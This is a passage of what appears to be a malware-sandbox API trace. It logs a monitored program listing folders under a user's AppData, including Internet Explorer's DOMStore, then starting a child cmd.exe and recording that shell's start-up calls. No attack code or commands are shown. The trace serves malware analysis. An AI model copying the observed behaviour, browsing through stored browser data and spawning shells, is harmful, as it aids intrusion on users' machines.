lpMem=0x3fb70b8 | out: hHeap=0x5d0000) returned 1 [0057.619] FindNextFileW (in: hFindFile=0x6c4028, lpFindFileData=0x3aaf094 | out: lpFindFileData=0x3aaf094*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IMJP9_0", cAlternateFileName="")) returned 1 [0057.619] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4428 [0057.619] FindNextFileW (in: hFindFile=0x6c4428, lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.619] FindNextFileW (in: hFindFile=0x6c4428, lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.619] FindClose (in: hFindFile=0x6c4428 | out: hFindFile=0x6c4428) returned 1 [0057.620] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fb70b8 | out: hHeap=0x5d0000) returned 1 [0057.620] FindNextFileW (in: hFindFile=0x6c4028, lpFindFileData=0x3aaf094 | out: lpFindFileData=0x3aaf094*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0057.620] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c41e8 [0057.929] FindNextFileW (in: hFindFile=0x6c41e8, lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.933] FindNextFileW (in: hFindFile=0x6c41e8, lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DOMStore", cAlternateFileName="")) returned 1 [0057.934] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore") returned 83 Thread: id = 25 os_tid = 0xa04 Thread: id = 34 os_tid = 0xa18 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x4e9d5000" os_pid = "0x970" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x964" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0x974 [0032.671] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f890 | out: lpSystemTimeAsFileTime=0x28f890*(dwLowDateTime=0x12423610, dwHighDateTime=0x1d53e5f)) [0032.671] GetCurrentProcessId () returned 0x970 [0032.671] GetCurrentThreadId () returned 0x974 [0032.671] GetTickCount () returned 0x18342 [0032.671] QueryPerformanceCounter (in: lpPerformanceCount=0x28f898 | out: lpPerformanceCount=0x28f898*=15296320131) returned 1 [0032.672] GetModuleHandleW (lpModuleName=0x0) returned 0x4a870000 [0032.672] __set_app_type (_Type=0x1) [0032.672] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a897810) returned 0x0 [0032.673] __getmainargs (in: _Argc=0x4a8ba608, _Argv=0x4a8ba618, _Env=0x4a8ba610, _DoWildCard=0, _StartInfo=0x4a89e0f4 | out: _Argc=0x4a8ba608, _Argv=0x4a8ba618, _Env=0x4a8ba610) returned 0 [0032.673] GetCurrentThreadId () returned 0x974 [0032.673] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x974) returned 0x3c [0032.673] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0032.674] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0032.674] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0032.674] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0032.674] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f828 | out: phkResult=0x28f828*=0x0) returned 0x2 [0032.674] VirtualQuery (in: lpAddress=0x28f810, lpBuffer=0x28f790, dwLength=0x30 | out: lpBuffer=0x28f790*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0032.674] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f790, dwLength=0x30 | out: lpBuffer=0x28f790*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0032.674] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f790, dwLength=0x30 | out: lpBuffer=0x28f790*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0032.674] VirtualQuery (in: lpAddress=0x194000, lpBuffer=0x28f790, dwLength=0x30 | out: lpBuffer=0x28f790*(BaseAddress=0x194000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0032.674] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f790, dwLength=0x30 | out: lpBuffer=0x28f790*(BaseAddress=0x290000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0032.674] GetConsoleOutputCP () returned 0x1b5 [0032.674] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a8abfe0 | out: lpCPInfo=0x4a8abfe0) returned 1 [0032.675] SetConsoleCtrlHandler (HandlerRoutine=0x4a893184, Add=1) returned 1 [0032.675] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.675] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0032.675] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.675] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x4a89e194 | out: lpMode=0x4a89e194) returned 0 [0032.675] _get_osfhandle (_FileHandle=0) returned 0xe8 [0032.675] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x4a89e198 | out: lpMode=0x4a89e198) returned 0 [0032.675] GetEnvironmentStringsW () returned 0x2f8a60* [0032.675] GetProcessHeap () returned 0x2e0000 [0032.675] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xa7c) returned 0x2f94f0 [0032.675] FreeEnvironmentStringsW (penv=0x2f8a60) returned 1 [0032.675] GetProcessHeap () returned 0x2e0000 [0032.675] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x8) returned 0x2f88e0 [0032.675] GetEnvironmentStringsW () returned 0x2f8a60* [0032.675] GetProcessHeap () returned 0x2e0000 [0032.676] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xa7c) returned 0x2f9f80 [0032.676] FreeEnvironmentStringsW (penv=0x2f8a60) returned 1 [0032.676] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e6e8 | out: phkResult=0x28e6e8*=0x44) returned 0x0 [0032.676] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e6e0, lpData=0x28e700, lpcbData=0x28e6e4*=0x1000 | out: lpType=0x28e6e0*=0x0, lpData=0x28e700*=0x18, lpcbData=0x28e6e4*=0x1000) returned 0x2 [0032.676] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e6e0, lpData=0x28e700, lpcbData=0x28e6e4*=0x1000 | out: lpType=0x28e6e0*=0x4, lpData=0x28e700*=0x1, lpcbData=0x28e6e4*=0x4) returned 0x0 [0032.676] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e6e0, lpData=0x28e700, lpcbData=0x28e6e4*=0x1000 | out: lpType=0x28e6e0*=0x0, lpData=0x28e700*=0x1, lpcbData=0x28e6e4*=0x1000) returned 0x2 [0032.676] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e6e0, lpData=0x28e700, lpcbData=0x28e6e4*=0x1000 | out: lpType=0x28e6e0*=0x4, lpData=0x28e700*=0x0, lpcbData=0x28e6e4*=0x4) returned 0x0 [0032.676] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e6e0, lpData=0x28e700, lpcbData=0x28e6e4*=0x1000 | out: lpType=0x28e6e0*=0x4, lpData=0x28e700*=0x40, lpcbData=0x28e6e4*=0x4) returned 0x0 [0032.676] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e6e0, lpData=0x28e700, lpcbData=0x28e6e4*=0x1000 | out: lpType=0x28e6e0*=0x4, lpData=0x28e700*=0x40, lpcbData=0x28e6e4*=0x4) returned 0x0 [0032.676] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e6e0, lpData=0x28e700, lpcbData=0x28e6e4*=0x1000 | out: lpType=0x28e6e0*=0x0, lpData=0x28e700*=0x40, lpcbData=0x28e6e4*=0x1000) returned 0x2 [0032.676] RegCloseKey (hKey=0x44) returned 0x0 [0032.676] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e6e8 | out: phkResult=0x28e6e8*=0x44) returned 0x0 [0032.676] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e6e0, lpData=0x28e700, lpcbData=0x28e6e4*=0x1000 | out: lpType=0x28e6e0*=0x0, lpData=0x28e700*=0x40, lpcbData=0x28e6e4*=0x1000) returned 0x2 [0032.676] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e6e0, lpData=0x28e700, lpcbData=0x28e6e4*=0x1000 | out: lpType=0x28e6e0*=0x4, lpData=0x28e700*=0x1, lpcbData=0x28e6e4*=0x4) returned 0x0 [0032.676] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e6e0, lpData=0x28e700, lpcbData=0x28e6e4*=0x1000 | out: lpType=0x28e6e0*=0x0, lpData=0x28e700*=0x1, lpcbData=0x28e6e4*=0x1000) returned 0x2 [0032.676] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e6e0, lpData=0x28e700, lpcbData=0x28e6e4*=0x1000 | out: lpType=0x28e6e0*=0x4, lpData=0x28e700*=0x0, lpcbData=0x28e6e4*=0x4) returned 0x0 [0032.676] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e6e0, lpData=0x28e700, lpcbData=0x28e6e4*=0x1000 | out: lpType=0x28e6e0*=0x4, lpData=0x28e700*=0x9, lpcbData=0x28e6e4*=0x4) returned 0x0 [0032.676] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e6e0, lpData=0x28e700, lpcbData=0x28e6e4*=0x1000 | out: lpType=0x28e6e0*=0x4, lpData=0x28e700*=0x9, lpcbData=0x28e6e4*=0x4) returned 0x0 [0032.676] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e6e0, lpData=0x28e700, lpcbData=0x28e6e4*=0x1000 | out: lpType=0x28e6e0*=0x0, lpData=0x28e700*=0x9, lpcbData=0x28e6e4*=0x1000) returned 0x2 [0032.677] RegCloseKey (hKey=0x44) returned 0x0 [0032.677] time (in: timer=0x0 | out: timer=0x0) returned 0x5d320aa4 [0032.677] srand (_Seed=0x5d320aa4) [0032.677] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0032.677] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0032.677] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a8ac0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0032.677] GetProcessHeap () returned 0x2e0000 [0032.677] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x218) returned 0x2faa10 [0032.677] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2faa20, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0032.677] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a89f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0032.677] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a89f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0032.677] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a89f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0032.677] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0032.677] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0032.677] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0032.677] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0032.677] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0032.677] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0032.677] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0032.677] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0032.677] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0032.678] GetProcessHeap () returned 0x2e0000 [0032.678] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f94f0 | out: hHeap=0x2e0000) returned 1 [0032.678] GetEnvironmentStringsW () returned 0x2f8a60* [0032.678] GetProcessHeap () returned 0x2e0000 [0032.678] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xa94) returned 0x2fac30 [0032.678] FreeEnvironmentStringsW (penv=0x2f8a60) returned 1 [0032.678] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a89f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0032.678] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a89f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0032.678] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0032.678] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0032.678] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0032.678] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0032.678] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0032.678] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0032.678] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0032.678] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0032.678] GetProcessHeap () returned 0x2e0000 [0032.678] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x5c) returned 0x2fb6d0 [0032.678] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f4f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0032.678] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x28f4f0, lpFilePart=0x28f4d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x28f4d0*="Desktop") returned 0x25 [0032.678] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0032.678] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f200 | out: lpFindFileData=0x28f200*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x2fb740 [0032.679] FindClose (in: hFindFile=0x2fb740 | out: hFindFile=0x2fb740) returned 1 [0032.679] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x28f200 | out: lpFindFileData=0x28f200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x2fb740 [0032.679] FindClose (in: hFindFile=0x2fb740 | out: hFindFile=0x2fb740) returned 1 [0032.679] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0032.679] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x28f200 | out: lpFindFileData=0x28f200*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcb196f0, ftLastAccessTime.dwHighDateTime=0x1d53e5f, ftLastWriteTime.dwLowDateTime=0xcb196f0, ftLastWriteTime.dwHighDateTime=0x1d53e5f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x2fb740 [0032.679] FindClose (in: hFindFile=0x2fb740 | out: hFindFile=0x2fb740) returned 1 [0032.679] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0032.679] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0032.679] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0032.679] GetProcessHeap () returned 0x2e0000 [0032.679] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fac30 | out: hHeap=0x2e0000) returned 1 [0032.679] GetEnvironmentStringsW () returned 0x2fb740* [0032.679] GetProcessHeap () returned 0x2e0000 [0032.679] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xae8) returned 0x2fc230 [0032.679] FreeEnvironmentStringsW (penv=0x2fb740) returned 1 [0032.679] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a8ac0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0032.679] GetProcessHeap () returned 0x2e0000 [0032.679] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fb6d0 | out: hHeap=0x2e0000) returned 1 [0032.679] GetProcessHeap () returned 0x2e0000 [0032.680] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4016) returned 0x2fcd20 [0032.680] GetProcessHeap () returned 0x2e0000 [0032.680] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fcd20 | out: hHeap=0x2e0000) returned 1 [0032.680] GetConsoleOutputCP () returned 0x1b5 [0032.680] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a8abfe0 | out: lpCPInfo=0x4a8abfe0) returned 1 [0032.680] GetUserDefaultLCID () returned 0x409 [0032.681] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a8a7b50, cchData=8 | out: lpLCData=":") returned 2 [0032.681] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f600, cchData=128 | out: lpLCData="0") returned 2 [0032.681] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f600, cchData=128 | out: lpLCData="0") returned 2 [0032.681] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f600, cchData=128 | out: lpLCData="1") returned 2 [0032.681] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a8ba740, cchData=8 | out: lpLCData="/") returned 2 [0032.681] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a8ba4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0032.681] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a8ba460, cchData=32 | out: lpLCData="Tue") returned 4 [0032.681] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a8ba420, cchData=32 | out: lpLCData="Wed") returned 4 [0032.681] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a8ba3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0032.681] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a8ba3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0032.681] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a8ba360, cchData=32 | out: lpLCData="Sat") returned 4 [0032.681] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a8ba700, cchData=32 | out: lpLCData="Sun") returned 4 [0032.681] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a8a7b40, cchData=8 | out: lpLCData=".") returned 2 [0032.681] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a8ba4e0, cchData=8 | out: lpLCData=",") returned 2 [0032.681] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0032.682] GetProcessHeap () returned 0x2e0000 [0032.682] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20c) returned 0x2f95c0 [0032.682] GetConsoleTitleW (in: lpConsoleTitle=0x2f95c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0032.682] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.682] GetFileType (hFile=0xf4) returned 0x3 [0032.682] BrandingFormatString () returned 0x2f97e0 [0032.694] GetVersion () returned 0x1db10106 [0032.694] _vsnwprintf (in: _Buffer=0x28f770, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x28f708 | out: _Buffer="6.1.7601") returned 8 [0032.694] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.694] GetFileType (hFile=0xf4) returned 0x3 [0032.694] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a8b6340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0032.694] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a8b6340, nSize=0x2000, Arguments=0x28f710 | out: lpBuffer="Microsoft Windows [Version 6.1.7601]") returned 0x24 [0032.694] _get_osfhandle (_FileHandle=1) returned 0xf4 [0032.694] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 6.1.7601]", cchWideChar=-1, lpMultiByteStr=0x4a8ac320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 6.1.7601]", lpUsedDefaultChar=0x0) returned 37 [0032.694] WriteFile (in: hFile=0xf4, lpBuffer=0x4a8ac320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x28f698, lpOverlapped=0x0 | out: lpBuffer=0x4a8ac320*, 